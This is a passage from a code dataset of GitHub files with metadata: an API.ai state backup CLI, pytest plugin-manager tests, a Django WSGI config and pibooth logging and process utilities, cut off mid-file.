| text (string, lengths 4–1.02M) | meta (dict) |
|---|---|
from homie.main import *
|
{
"content_hash": "8fc77d6f06b51d577e048e3eacdae05b",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 24,
"avg_line_length": 25,
"alnum_prop": 0.76,
"repo_name": "MrBramme/Mqtt-Hyperion-Remote",
"id": "a947c1f888a33acec482d58d5898078d5d98f7da",
"size": "47",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "modules/homie/__init__.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "179781"
}
],
"symlink_target": ""
}
|
import os
import pickle
import requests
import click
from git import Repo
API_AI_HEADERS = None
BASE_URL = 'https://api.api.ai/v1/'
DEV_KEY = None
DEV_TOKEN_ENV_NAME = 'API_AI_DEV_TOKEN'
API_AI_HISTORY_DIR = 'api_ai_history'
API_AI_REPO = '{}/{}'.format(os.getcwd(), API_AI_HISTORY_DIR)
@click.group()
def cli():
pass
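# Rough usage sketch (assumption: the file is invoked directly as api-ai-git.py;
# the exact command spelling may differ depending on the installed Click version):
#   python api-ai-git.py init <REPO_URL>
#   python api-ai-git.py save_state --commit
#   python api-ai-git.py load_state --commit-hash <HASH>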
@cli.command()
@click.argument('repo_url')
def init(repo_url):
"""
Clone the submodule (a separate repo) used to track API.ai history. This is required before use.
"""
# TODO(jhurt): Handle private repos by using user's Github credentials
try:
if requests.head(repo_url).status_code != 200:
print('Cannot reach this URL. Terminating.')
return
except Exception:
# Likely a malformed URL, but requests can raise any number of URL-related exceptions, so catch them all
print('Likely a malformed URL. Terminating.')
return
repo = Repo(os.getcwd())
repo.create_submodule(API_AI_HISTORY_DIR, API_AI_REPO, url=repo_url, branch='master')
print('Submodule added. You may now save/load your state from/to API.ai')
@cli.command()
@click.option('--commit', is_flag=True, help='Automatically commit the saved state.')
@click.option('--push', is_flag=True, help='Automatically push (and commit) the saved state')
def save_state(push, commit):
"""
Saves API.ai state (Intents/Entities) as serialized data to be loaded later
"""
if not environment_valid():
return
print('Saving entire state!')
intents = get_resource_dict('intents')
entities = get_resource_dict('entities')
# 'wb' means write the files in binary mode
with open(API_AI_HISTORY_DIR + '/intents.pickle', 'wb') as f, open(API_AI_HISTORY_DIR + '/entities.pickle', 'wb') as f2:
pickle.dump(intents, f)
pickle.dump(entities, f2)
repo = Repo(API_AI_REPO)
repo.index.add([
API_AI_REPO + '/intents.pickle',
API_AI_REPO + '/entities.pickle'
])
if push:
commit = True
if commit:
repo.index.commit('# Intents: {}, # Entities: {}'.format(len(intents), len(entities)))
if push:
repo.remote().push()
@cli.command()
@click.option('--commit-hash', default=None, help="A commit hash to make the state of API.ai match.")
def load_state(commit_hash):
"""
Restores state of all Intents/Entities from commit hash to API.ai
"""
if not environment_valid():
return
repo = Repo(API_AI_REPO)
target_commit = None
# Get the Commit object based on the hash user provided
if commit_hash:
for c in repo.iter_commits():
if c.hexsha == commit_hash:
target_commit = c
break
# User didn't provide a commit hash so show last 10 for them to choose from
if not commit_hash:
# Show last 10 commits from CURRENT BRANCH
commits = list(repo.iter_commits(max_count=10))
for i, commit_obj in enumerate(commits):
print("({}) {} {}".format(i, commit_obj.hexsha, commit_obj.message))
try:
num_pressed = int(input("Press number corresponding to which commit you'd like to load the state from: "))
if 0 <= num_pressed <= min(len(commits) - 1, 9):
target_commit = commits[num_pressed]
else:
raise ValueError
except ValueError:
print('Enter a value between 0-{}. Terminating.'.format(min(len(commits) - 1, 9)))
return
print('Loading entire state! Please be patient.')
intents, entities = None, None
# TODO(jhurt): make this only iterate through the API.ai specific pickle files.
# Maybe put them in their own directory and limit the "tree" path to blobs in that path?
for b in target_commit.tree.blobs:
if b.name == "intents.pickle":
intents = pickle.loads(b.data_stream.read())
if b.name == "entities.pickle":
entities = pickle.loads(b.data_stream.read())
sync_api_ai(intents, entities)
print('Refresh the API.ai dashboard to see changes')
def sync_api_ai(old_intents, old_entities):
cur_intents = get_resource_dict('intents')
cur_entities = get_resource_dict('entities')
cur_intents_ids = { x['id'] for x in cur_intents.values() }
cur_entities_ids = { x['id'] for x in cur_entities.values() }
# TODO(jhurt): Currently deleting everything then recreating everything due to odd behavior regarding IDs.
# Make this more efficient because numerous or large Intents/Entities could take a long time to send over the network.
# DELETE all current Intents
for intent_id in cur_intents_ids:
requests.delete(BASE_URL+'intents/'+intent_id, headers=API_AI_HEADERS)
# DELETE all current Entities
for entity_id in cur_entities_ids:
requests.delete(BASE_URL+'entities/'+entity_id, headers=API_AI_HEADERS)
# CREATE all old Intents (will have new IDs now but that's okay)
for intent in old_intents.values():
# Intent object can't have the 'id' attribute for a POST
if intent.get('id') is not None:
del intent['id']
requests.post(BASE_URL+'intents', headers=API_AI_HEADERS, json=intent)
# CREATE all old Entities (will have new IDs now but that's okay)
for entity in old_entities.values():
# Entity object can't have the 'id' attribute for a POST
if entity.get('id') is not None:
del entity['id']
requests.post(BASE_URL+'entities', headers=API_AI_HEADERS, json=entity)
def get_resource_dict(resource):
"""
Fetch every resource of the given type from API.ai, keyed by its id.
:param resource: either 'intents' or 'entities' as of right now
:return: dict in form { 'id' : resource_dict }
"""
resource_json = requests.get(BASE_URL+resource, headers=API_AI_HEADERS).json()
resources = {}
for d in resource_json:
resources[d['id']] = requests.get(BASE_URL+resource+'/'+d['id'], headers=API_AI_HEADERS).json()
return resources
def environment_valid():
global API_AI_HEADERS
global DEV_KEY
DEV_KEY = os.getenv(DEV_TOKEN_ENV_NAME)
if DEV_KEY is None:
print("Please set environment variable {}".format(DEV_TOKEN_ENV_NAME))
return False
API_AI_HEADERS = {'Authorization' : 'Bearer {}'.format(DEV_KEY)}
repo = Repo(os.getcwd())
found_submodule = False
for module in repo.submodules:
if module.name == API_AI_HISTORY_DIR:
found_submodule = True
if not found_submodule:
print("Re-run tool with 'init <REPO_URL>' command where <REPO_URL> is a "
"public Github repo where you would like to save your API.ai history.")
return False
return True
if __name__ == '__main__':
cli()
|
{
"content_hash": "923323b6f1073fd4313086592aef4d0e",
"timestamp": "",
"source": "github",
"line_count": 178,
"max_line_length": 125,
"avg_line_length": 38.67977528089887,
"alnum_prop": 0.639360929557008,
"repo_name": "CamelCaseNotation/api-ai-git",
"id": "5ac30fa325a7cd55d5294892be1cced2dc78966f",
"size": "6935",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "api-ai-git.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "6935"
}
],
"symlink_target": ""
}
|
import pytest, py, os
from _pytest.core import PluginManager
from _pytest.core import MultiCall, HookRelay, varnames
class TestBootstrapping:
def test_consider_env_fails_to_import(self, monkeypatch):
pluginmanager = PluginManager()
monkeypatch.setenv('PYTEST_PLUGINS', 'nonexisting', prepend=",")
pytest.raises(ImportError, "pluginmanager.consider_env()")
def test_preparse_args(self):
pluginmanager = PluginManager()
pytest.raises(ImportError, """
pluginmanager.consider_preparse(["xyz", "-p", "hello123"])
""")
def test_plugin_prevent_register(self):
pluginmanager = PluginManager()
pluginmanager.consider_preparse(["xyz", "-p", "no:abc"])
l1 = pluginmanager.getplugins()
pluginmanager.register(42, name="abc")
l2 = pluginmanager.getplugins()
assert len(l2) == len(l1)
def test_plugin_prevent_register_unregistered_already_registered(self):
pluginmanager = PluginManager()
pluginmanager.register(42, name="abc")
l1 = pluginmanager.getplugins()
assert 42 in l1
pluginmanager.consider_preparse(["xyz", "-p", "no:abc"])
l2 = pluginmanager.getplugins()
assert 42 not in l2
def test_plugin_double_register(self):
pm = PluginManager()
pm.register(42, name="abc")
pytest.raises(ValueError, lambda: pm.register(42, name="abc"))
def test_plugin_skip(self, testdir, monkeypatch):
p = testdir.makepyfile(skipping1="""
import pytest
pytest.skip("hello")
""")
p.copy(p.dirpath("skipping2.py"))
monkeypatch.setenv("PYTEST_PLUGINS", "skipping2")
result = testdir.runpytest("-p", "skipping1", "--traceconfig")
assert result.ret == 0
result.stdout.fnmatch_lines([
"*hint*skipping1*hello*",
"*hint*skipping2*hello*",
])
def test_consider_env_plugin_instantiation(self, testdir, monkeypatch):
pluginmanager = PluginManager()
testdir.syspathinsert()
testdir.makepyfile(xy123="#")
monkeypatch.setitem(os.environ, 'PYTEST_PLUGINS', 'xy123')
l1 = len(pluginmanager.getplugins())
pluginmanager.consider_env()
l2 = len(pluginmanager.getplugins())
assert l2 == l1 + 1
assert pluginmanager.getplugin('xy123')
pluginmanager.consider_env()
l3 = len(pluginmanager.getplugins())
assert l2 == l3
def test_consider_setuptools_instantiation(self, monkeypatch):
pkg_resources = py.test.importorskip("pkg_resources")
def my_iter(name):
assert name == "pytest11"
class EntryPoint:
name = "pytest_mytestplugin"
dist = None
def load(self):
class PseudoPlugin:
x = 42
return PseudoPlugin()
return iter([EntryPoint()])
monkeypatch.setattr(pkg_resources, 'iter_entry_points', my_iter)
pluginmanager = PluginManager()
pluginmanager.consider_setuptools_entrypoints()
plugin = pluginmanager.getplugin("mytestplugin")
assert plugin.x == 42
def test_consider_setuptools_not_installed(self, monkeypatch):
monkeypatch.setitem(py.std.sys.modules, 'pkg_resources',
py.std.types.ModuleType("pkg_resources"))
pluginmanager = PluginManager()
pluginmanager.consider_setuptools_entrypoints()
# ok, we did not explode
def test_pluginmanager_ENV_startup(self, testdir, monkeypatch):
x500 = testdir.makepyfile(pytest_x500="#")
p = testdir.makepyfile("""
import pytest
def test_hello(pytestconfig):
plugin = pytestconfig.pluginmanager.getplugin('pytest_x500')
assert plugin is not None
""")
monkeypatch.setenv('PYTEST_PLUGINS', 'pytest_x500', prepend=",")
result = testdir.runpytest(p)
assert result.ret == 0
result.stdout.fnmatch_lines(["*1 passed in*"])
def test_import_plugin_importname(self, testdir):
pluginmanager = PluginManager()
pytest.raises(ImportError, 'pluginmanager.import_plugin("qweqwex.y")')
pytest.raises(ImportError, 'pluginmanager.import_plugin("pytest_qweqwx.y")')
reset = testdir.syspathinsert()
pluginname = "pytest_hello"
testdir.makepyfile(**{pluginname: ""})
pluginmanager.import_plugin("pytest_hello")
len1 = len(pluginmanager.getplugins())
pluginmanager.import_plugin("pytest_hello")
len2 = len(pluginmanager.getplugins())
assert len1 == len2
plugin1 = pluginmanager.getplugin("pytest_hello")
assert plugin1.__name__.endswith('pytest_hello')
plugin2 = pluginmanager.getplugin("pytest_hello")
assert plugin2 is plugin1
def test_import_plugin_dotted_name(self, testdir):
pluginmanager = PluginManager()
pytest.raises(ImportError, 'pluginmanager.import_plugin("qweqwex.y")')
pytest.raises(ImportError, 'pluginmanager.import_plugin("pytest_qweqwex.y")')
reset = testdir.syspathinsert()
testdir.mkpydir("pkg").join("plug.py").write("x=3")
pluginname = "pkg.plug"
pluginmanager.import_plugin(pluginname)
mod = pluginmanager.getplugin("pkg.plug")
assert mod.x == 3
def test_consider_module(self, testdir):
pluginmanager = PluginManager()
testdir.syspathinsert()
testdir.makepyfile(pytest_p1="#")
testdir.makepyfile(pytest_p2="#")
mod = py.std.types.ModuleType("temp")
mod.pytest_plugins = ["pytest_p1", "pytest_p2"]
pluginmanager.consider_module(mod)
assert pluginmanager.getplugin("pytest_p1").__name__ == "pytest_p1"
assert pluginmanager.getplugin("pytest_p2").__name__ == "pytest_p2"
def test_consider_module_import_module(self, testdir):
mod = py.std.types.ModuleType("x")
mod.pytest_plugins = "pytest_a"
aplugin = testdir.makepyfile(pytest_a="#")
pluginmanager = PluginManager()
reprec = testdir.getreportrecorder(pluginmanager)
#syspath.prepend(aplugin.dirpath())
py.std.sys.path.insert(0, str(aplugin.dirpath()))
pluginmanager.consider_module(mod)
call = reprec.getcall(pluginmanager.hook.pytest_plugin_registered.name)
assert call.plugin.__name__ == "pytest_a"
# check that it is not registered twice
pluginmanager.consider_module(mod)
l = reprec.getcalls("pytest_plugin_registered")
assert len(l) == 1
def test_config_sets_conftesthandle_onimport(self, testdir):
config = testdir.parseconfig([])
assert config._conftest._onimport == config._onimportconftest
def test_consider_conftest_deps(self, testdir):
mod = testdir.makepyfile("pytest_plugins='xyz'").pyimport()
pp = PluginManager()
pytest.raises(ImportError, "pp.consider_conftest(mod)")
def test_pm(self):
pp = PluginManager()
class A: pass
a1, a2 = A(), A()
pp.register(a1)
assert pp.isregistered(a1)
pp.register(a2, "hello")
assert pp.isregistered(a2)
l = pp.getplugins()
assert a1 in l
assert a2 in l
assert pp.getplugin('hello') == a2
pp.unregister(a1)
assert not pp.isregistered(a1)
pp.unregister(name="hello")
assert not pp.isregistered(a2)
def test_pm_ordering(self):
pp = PluginManager()
class A: pass
a1, a2 = A(), A()
pp.register(a1)
pp.register(a2, "hello")
l = pp.getplugins()
assert l.index(a1) < l.index(a2)
a3 = A()
pp.register(a3, prepend=True)
l = pp.getplugins()
assert l.index(a3) == 0
def test_register_imported_modules(self):
pp = PluginManager()
mod = py.std.types.ModuleType("x.y.pytest_hello")
pp.register(mod)
assert pp.isregistered(mod)
l = pp.getplugins()
assert mod in l
pytest.raises(ValueError, "pp.register(mod)")
mod2 = py.std.types.ModuleType("pytest_hello")
#pp.register(mod2) # double pm
pytest.raises(ValueError, "pp.register(mod)")
#assert not pp.isregistered(mod2)
assert pp.getplugins() == l
def test_canonical_import(self, monkeypatch):
mod = py.std.types.ModuleType("pytest_xyz")
monkeypatch.setitem(py.std.sys.modules, 'pytest_xyz', mod)
pp = PluginManager()
pp.import_plugin('pytest_xyz')
assert pp.getplugin('pytest_xyz') == mod
assert pp.isregistered(mod)
def test_register_mismatch_method(self):
pp = PluginManager(load=True)
class hello:
def pytest_gurgel(self):
pass
pytest.raises(Exception, "pp.register(hello())")
def test_register_mismatch_arg(self):
pp = PluginManager(load=True)
class hello:
def pytest_configure(self, asd):
pass
excinfo = pytest.raises(Exception, "pp.register(hello())")
def test_notify_exception(self, capfd):
pp = PluginManager()
excinfo = pytest.raises(ValueError, "raise ValueError(1)")
pp.notify_exception(excinfo)
out, err = capfd.readouterr()
assert "ValueError" in err
class A:
def pytest_internalerror(self, excrepr):
return True
pp.register(A())
pp.notify_exception(excinfo)
out, err = capfd.readouterr()
assert not err
def test_register(self):
pm = PluginManager(load=False)
class MyPlugin:
pass
my = MyPlugin()
pm.register(my)
assert pm.getplugins()
my2 = MyPlugin()
pm.register(my2)
assert pm.getplugins()[1:] == [my, my2]
assert pm.isregistered(my)
assert pm.isregistered(my2)
pm.unregister(my)
assert not pm.isregistered(my)
assert pm.getplugins()[1:] == [my2]
def test_listattr(self):
plugins = PluginManager()
class api1:
x = 41
class api2:
x = 42
class api3:
x = 43
plugins.register(api1())
plugins.register(api2())
plugins.register(api3())
l = list(plugins.listattr('x'))
assert l == [41, 42, 43]
def test_hook_tracing(self):
pm = PluginManager()
saveindent = []
class api1:
x = 41
def pytest_plugin_registered(self, plugin):
saveindent.append(pm.trace.root.indent)
raise ValueError(42)
l = []
pm.trace.root.setwriter(l.append)
indent = pm.trace.root.indent
p = api1()
pm.register(p)
assert pm.trace.root.indent == indent
assert len(l) == 1
assert 'pytest_plugin_registered' in l[0]
pytest.raises(ValueError, lambda: pm.register(api1()))
assert pm.trace.root.indent == indent
assert saveindent[0] > indent
class TestPytestPluginInteractions:
def test_addhooks_conftestplugin(self, testdir):
newhooks = testdir.makepyfile(newhooks="""
def pytest_myhook(xyz):
"new hook"
""")
conf = testdir.makeconftest("""
import sys ; sys.path.insert(0, '.')
import newhooks
def pytest_addhooks(pluginmanager):
pluginmanager.addhooks(newhooks)
def pytest_myhook(xyz):
return xyz + 1
""")
config = testdir.Config()
config._conftest.importconftest(conf)
print(config.pluginmanager.getplugins())
res = config.hook.pytest_myhook(xyz=10)
assert res == [11]
def test_addhooks_nohooks(self, testdir):
conf = testdir.makeconftest("""
import sys
def pytest_addhooks(pluginmanager):
pluginmanager.addhooks(sys)
""")
res = testdir.runpytest()
assert res.ret != 0
res.stderr.fnmatch_lines([
"*did not find*sys*"
])
def test_namespace_early_from_import(self, testdir):
p = testdir.makepyfile("""
from pytest import Item
from pytest import Item as Item2
assert Item is Item2
""")
result = testdir.runpython(p)
assert result.ret == 0
def test_do_ext_namespace(self, testdir):
testdir.makeconftest("""
def pytest_namespace():
return {'hello': 'world'}
""")
p = testdir.makepyfile("""
from py.test import hello
import py
def test_hello():
assert hello == "world"
assert 'hello' in py.test.__all__
""")
result = testdir.runpytest(p)
result.stdout.fnmatch_lines([
"*1 passed*"
])
def test_do_option_postinitialize(self, testdir):
config = testdir.parseconfigure()
assert not hasattr(config.option, 'test123')
p = testdir.makepyfile("""
def pytest_addoption(parser):
parser.addoption('--test123', action="store_true",
default=True)
""")
config._conftest.importconftest(p)
assert config.option.test123
def test_configure(self, testdir):
config = testdir.parseconfig()
l = []
class A:
def pytest_configure(self, config):
l.append(self)
config.pluginmanager.register(A())
assert len(l) == 0
config.pluginmanager.do_configure(config=config)
assert len(l) == 1
config.pluginmanager.register(A()) # leads to a configured() plugin
assert len(l) == 2
assert l[0] != l[1]
config.pluginmanager.do_unconfigure(config=config)
config.pluginmanager.register(A())
assert len(l) == 2
# lower level API
def test_listattr(self):
pluginmanager = PluginManager()
class My2:
x = 42
pluginmanager.register(My2())
assert not pluginmanager.listattr("hello")
assert pluginmanager.listattr("x") == [42]
def test_listattr_tryfirst(self):
class P1:
@pytest.mark.tryfirst
def m(self):
return 17
class P2:
def m(self):
return 23
class P3:
def m(self):
return 19
pluginmanager = PluginManager()
p1 = P1()
p2 = P2()
p3 = P3()
pluginmanager.register(p1)
pluginmanager.register(p2)
pluginmanager.register(p3)
methods = pluginmanager.listattr('m')
assert methods == [p2.m, p3.m, p1.m]
# listattr keeps a cache and deleting
# a function attribute requires clearing it
pluginmanager._listattrcache.clear()
del P1.m.__dict__['tryfirst']
pytest.mark.trylast(getattr(P2.m, 'im_func', P2.m))
methods = pluginmanager.listattr('m')
assert methods == [p2.m, p1.m, p3.m]
def test_namespace_has_default_and_env_plugins(testdir):
p = testdir.makepyfile("""
import pytest
pytest.mark
""")
result = testdir.runpython(p)
assert result.ret == 0
def test_varnames():
def f(x):
i = 3
class A:
def f(self, y):
pass
class B(object):
def __call__(self, z):
pass
assert varnames(f) == ("x",)
assert varnames(A().f) == ('y',)
assert varnames(B()) == ('z',)
class TestMultiCall:
def test_uses_copy_of_methods(self):
l = [lambda: 42]
mc = MultiCall(l, {})
repr(mc)
l[:] = []
res = mc.execute()
assert res == [42]
def test_call_passing(self):
class P1:
def m(self, __multicall__, x):
assert len(__multicall__.results) == 1
assert not __multicall__.methods
return 17
class P2:
def m(self, __multicall__, x):
assert __multicall__.results == []
assert __multicall__.methods
return 23
p1 = P1()
p2 = P2()
multicall = MultiCall([p1.m, p2.m], {'x': 23})
assert "23" in repr(multicall)
reslist = multicall.execute()
assert len(reslist) == 2
# ensure reversed order
assert reslist == [23, 17]
def test_keyword_args(self):
def f(x):
return x + 1
class A:
def f(self, x, y):
return x + y
multicall = MultiCall([f, A().f], dict(x=23, y=24))
assert "'x': 23" in repr(multicall)
assert "'y': 24" in repr(multicall)
reslist = multicall.execute()
assert reslist == [24+23, 24]
assert "2 results" in repr(multicall)
def test_keyword_args_with_defaultargs(self):
def f(x, z=1):
return x + z
reslist = MultiCall([f], dict(x=23, y=24)).execute()
assert reslist == [24]
reslist = MultiCall([f], dict(x=23, z=2)).execute()
assert reslist == [25]
def test_tags_call_error(self):
multicall = MultiCall([lambda x: x], {})
pytest.raises(TypeError, "multicall.execute()")
def test_call_subexecute(self):
def m(__multicall__):
subresult = __multicall__.execute()
return subresult + 1
def n():
return 1
call = MultiCall([n, m], {}, firstresult=True)
res = call.execute()
assert res == 2
def test_call_none_is_no_result(self):
def m1():
return 1
def m2():
return None
res = MultiCall([m1, m2], {}, firstresult=True).execute()
assert res == 1
res = MultiCall([m1, m2], {}).execute()
assert res == [1]
class TestHookRelay:
def test_happypath(self):
pm = PluginManager()
class Api:
def hello(self, arg):
"api hook 1"
mcm = HookRelay(hookspecs=Api, pm=pm, prefix="he")
assert hasattr(mcm, 'hello')
assert repr(mcm.hello).find("hello") != -1
class Plugin:
def hello(self, arg):
return arg + 1
pm.register(Plugin())
l = mcm.hello(arg=3)
assert l == [4]
assert not hasattr(mcm, 'world')
def test_only_kwargs(self):
pm = PluginManager()
class Api:
def hello(self, arg):
"api hook 1"
mcm = HookRelay(hookspecs=Api, pm=pm, prefix="he")
pytest.raises(TypeError, "mcm.hello(3)")
def test_firstresult_definition(self):
pm = PluginManager()
class Api:
def hello(self, arg):
"api hook 1"
hello.firstresult = True
mcm = HookRelay(hookspecs=Api, pm=pm, prefix="he")
class Plugin:
def hello(self, arg):
return arg + 1
pm.register(Plugin())
res = mcm.hello(arg=3)
assert res == 4
class TestTracer:
def test_simple(self):
from _pytest.core import TagTracer
rootlogger = TagTracer()
log = rootlogger.get("pytest")
log("hello")
l = []
rootlogger.setwriter(l.append)
log("world")
assert len(l) == 1
assert l[0] == "world [pytest]\n"
sublog = log.get("collection")
sublog("hello")
assert l[1] == "hello [pytest:collection]\n"
def test_indent(self):
from _pytest.core import TagTracer
rootlogger = TagTracer()
log = rootlogger.get("1")
l = []
log.root.setwriter(lambda arg: l.append(arg))
log("hello")
log.root.indent += 1
log("line1")
log("line2")
log.root.indent += 1
log("line3")
log("line4")
log.root.indent -= 1
log("line5")
log.root.indent -= 1
log("last")
assert len(l) == 7
names = [x[:x.rfind(' [')] for x in l]
assert names == ['hello', ' line1', ' line2',
' line3', ' line4', ' line5', 'last']
def test_readable_output_dictargs(self):
from _pytest.core import TagTracer
rootlogger = TagTracer()
out = rootlogger.format_message(['test'], [1])
assert out == ['1 [test]\n']
out2 = rootlogger.format_message(['test'], ['test', {'a':1}])
assert out2 == [
'test [test]\n',
' a: 1\n'
]
def test_setprocessor(self):
from _pytest.core import TagTracer
rootlogger = TagTracer()
log = rootlogger.get("1")
log2 = log.get("2")
assert log2.tags == tuple("12")
l = []
rootlogger.setprocessor(tuple("12"), lambda *args: l.append(args))
log("not seen")
log2("seen")
assert len(l) == 1
tags, args = l[0]
assert "1" in tags
assert "2" in tags
assert args == ("seen",)
l2 = []
rootlogger.setprocessor("1:2", lambda *args: l2.append(args))
log2("seen")
tags, args = l2[0]
assert args == ("seen",)
def test_setmyprocessor(self):
from _pytest.core import TagTracer
rootlogger = TagTracer()
log = rootlogger.get("1")
log2 = log.get("2")
l = []
log2.setmyprocessor(lambda *args: l.append(args))
log("not seen")
assert not l
log2(42)
assert len(l) == 1
tags, args = l[0]
assert "1" in tags
assert "2" in tags
assert args == (42,)
def test_default_markers(testdir):
result = testdir.runpytest("--markers")
result.stdout.fnmatch_lines([
"*tryfirst*first*",
"*trylast*last*",
])
|
{
"content_hash": "144fb7e2c0be203239d5a17f211827bb",
"timestamp": "",
"source": "github",
"line_count": 671,
"max_line_length": 85,
"avg_line_length": 32.80923994038748,
"alnum_prop": 0.560390642743584,
"repo_name": "lotaku/pytest-2.3.5",
"id": "0a18a8efc5e687f0743e2c8639bb14ddf140eafc",
"size": "22015",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "testing/test_core.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "12252"
},
{
"name": "Python",
"bytes": "816338"
}
],
"symlink_target": ""
}
|
"""
WSGI config for septimoarte project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "septimoarte.settings")
application = get_wsgi_application()
|
{
"content_hash": "ab5e97053bfb24eab9aa15318d94a97b",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 78,
"avg_line_length": 24.9375,
"alnum_prop": 0.7744360902255639,
"repo_name": "malon/septimoarte",
"id": "c7e323b445068ca5ccc56c5390483e00682f9801",
"size": "399",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "backend/septimoarte/wsgi.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "107456"
},
{
"name": "HTML",
"bytes": "408918"
},
{
"name": "JavaScript",
"bytes": "416895"
},
{
"name": "Makefile",
"bytes": "420"
},
{
"name": "Python",
"bytes": "5404"
},
{
"name": "Shell",
"bytes": "2546"
}
],
"symlink_target": ""
}
|
"""Pibooth utilities.
"""
import os
import sys
import time
import os.path as osp
import logging
import psutil
import functools
from fnmatch import fnmatchcase
import contextlib
import errno
import subprocess
try:
from itertools import zip_longest, islice
except ImportError:
# Python 2.x fallback
from itertools import izip_longest as zip_longest, islice
LOGGER = logging.getLogger("pibooth")
class BlockConsoleHandler(logging.StreamHandler):
default_level = logging.INFO
pattern_indent = '+< '
pattern_blocks = '| '
pattern_dedent = '+> '
current_indent = ''
def emit(self, record):
cls = self.__class__
if cls.is_debug():
record.msg = '{}{}'.format(cls.current_indent, record.msg)
logging.StreamHandler.emit(self, record)
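# Once the record is written, collapse the indent marker: a freshly opened
# block ('+< ') becomes a plain block prefix ('| '), and a just-closed
# block ('+> ') is dropped from the indent string.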
if cls.current_indent.endswith(cls.pattern_indent):
cls.current_indent = (cls.current_indent[:-len(cls.pattern_indent)] + cls.pattern_blocks)
elif cls.current_indent.endswith(cls.pattern_dedent):
cls.current_indent = cls.current_indent[:-len(cls.pattern_dedent)]
@classmethod
def is_debug(cls):
"""Return True if this handler is set to DEBUG level on the root logger.
"""
for hdlr in logging.getLogger().handlers:
if isinstance(hdlr, cls):
return hdlr.level < logging.INFO
return False
@classmethod
def indent(cls):
"""Begin a new log block.
"""
if cls.is_debug():
cls.current_indent += cls.pattern_indent
@classmethod
def dedent(cls):
"""End the current log block.
"""
if cls.is_debug():
cls.current_indent = (cls.current_indent[:-len(cls.pattern_blocks)] + cls.pattern_dedent)
class PoolingTimer(object):
"""
Timer to be used in a pooling loop to check if the timeout has been exceeded.
"""
def __init__(self, timeout, start=True):
self.timeout = timeout
self.time = None
self._paused_total = 0
self._paused_time = None
if start:
self.start()
def __enter__(self):
"""Start timer if used as context manager.
"""
self.start()
return self
def __exit__(self, *args):
"""Stop timer if used as context manager.
"""
self.time = None
def start(self):
"""Start the timer.
"""
if self.timeout < 0:
raise ValueError("PoolingTimer cannot be started if timeout is lower than zero")
if self._paused_time:
self._paused_total += time.time() - self._paused_time
self._paused_time = None
else:
self._paused_total = 0
self.time = time.time()
def freeze(self):
"""Pause the timer.
"""
if not self._paused_time:
self._paused_time = time.time()
def remaining(self):
"""Return the remaining seconds.
"""
if self.time is None:
remain = float(self.timeout)
else:
remain = self.timeout + self.paused() - (time.time() - self.time)
if remain < 0.0:
remain = 0.0
return remain
def paused(self):
"""Return the pause duration in seconds.
"""
if self._paused_time:
return self._paused_total + time.time() - self._paused_time
return self._paused_total
def elapsed(self):
"""Return the elapsed seconds.
"""
if self.time is None:
return 0.0
return time.time() - self.time - self.paused()
def is_timeout(self):
"""Return True if the timer is in timeout.
"""
if self.time is None:
raise RuntimeError("PoolingTimer has never been started")
return (time.time() - self.time - self.paused()) > self.timeout
def configure_logging(level=logging.INFO, msgfmt=logging.BASIC_FORMAT, datefmt=None, filename=None):
"""Configure root logger for console printing.
"""
root = logging.getLogger()
if not root.handlers:
# Set lower level to be sure that all handlers receive the logs
root.setLevel(logging.DEBUG)
if filename:
# Create a file handler, all levels are logged
filename = osp.abspath(osp.expanduser(filename))
dirname = osp.dirname(filename)
if not osp.isdir(dirname):
os.makedirs(dirname)
hdlr = logging.FileHandler(filename)
hdlr.setFormatter(logging.Formatter(msgfmt, datefmt))
hdlr.setLevel(logging.DEBUG)
root.addHandler(hdlr)
# Create a console handler
hdlr = BlockConsoleHandler(sys.stdout)
hdlr.setFormatter(logging.Formatter(msgfmt, datefmt))
if level is not None:
hdlr.setLevel(level)
BlockConsoleHandler.default_level = level
root.addHandler(hdlr)
def set_logging_level(level=None):
"""Set/restore the log level of the concole.
:param level: level as defined in the logging package
:type level: int
"""
for hdlr in logging.getLogger().handlers:
if isinstance(hdlr, BlockConsoleHandler):
if level is None:
# Restore the default level
level = BlockConsoleHandler.default_level
hdlr.setLevel(level)
@contextlib.contextmanager
def timeit(description):
"""Measure time execution.
"""
BlockConsoleHandler.indent()
LOGGER.info(description)
start = time.time()
try:
yield
finally:
BlockConsoleHandler.dedent()
LOGGER.debug("took %0.3f seconds", time.time() - start)
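# Usage sketch (capture_picture is a hypothetical callable):
#   with timeit("Taking a picture"):
#       capture_picture()
# The description is logged at INFO level and the elapsed time at DEBUG level.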
def take(n, iterable):
"""Return first n items of the iterable as a list.
"""
return list(islice(iterable, n))
def print_columns_words(words, column_count=3):
"""Print a list of words into columns.
"""
columns, dangling = divmod(len(words), column_count)
iter_words = iter(words)
columns = [take(columns + (dangling > i), iter_words) for i in range(column_count)]
paddings = [max(map(len, column)) for column in columns]
for row in zip_longest(*columns, fillvalue=''):
print(' '.join(word.ljust(pad) for word, pad in zip(row, paddings)))
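# Example (a sketch): print_columns_words(['a', 'bb', 'ccc', 'd'], column_count=2)
# prints two left-justified columns:
#   a  ccc
#   bb d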
def pkill(pattern):
"""Kill all process matching the given pattern.
:param pattern: pattern used to match processes
:type pattern: str
"""
for proc in psutil.process_iter():
if fnmatchcase(proc.name(), pattern):
LOGGER.debug("Try to kill process '%s'", proc.name())
try:
proc.kill()
except psutil.AccessDenied:
raise EnvironmentError("Can not kill '{}', root access is required. "
"(kill it manually before starting pibooth)".format(proc.name()))
def memorize(func):
"""Decorator to memorize and return the latest result
of a function.
"""
cache = {}
@functools.wraps(func)
def memorized_func_wrapper(*args, **kwargs):
if func not in cache:
cache[func] = func(*args, **kwargs)
return cache[func]
return memorized_func_wrapper
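# Usage sketch (load_settings_from_disk is a hypothetical expensive call):
#   @memorize
#   def load_settings():
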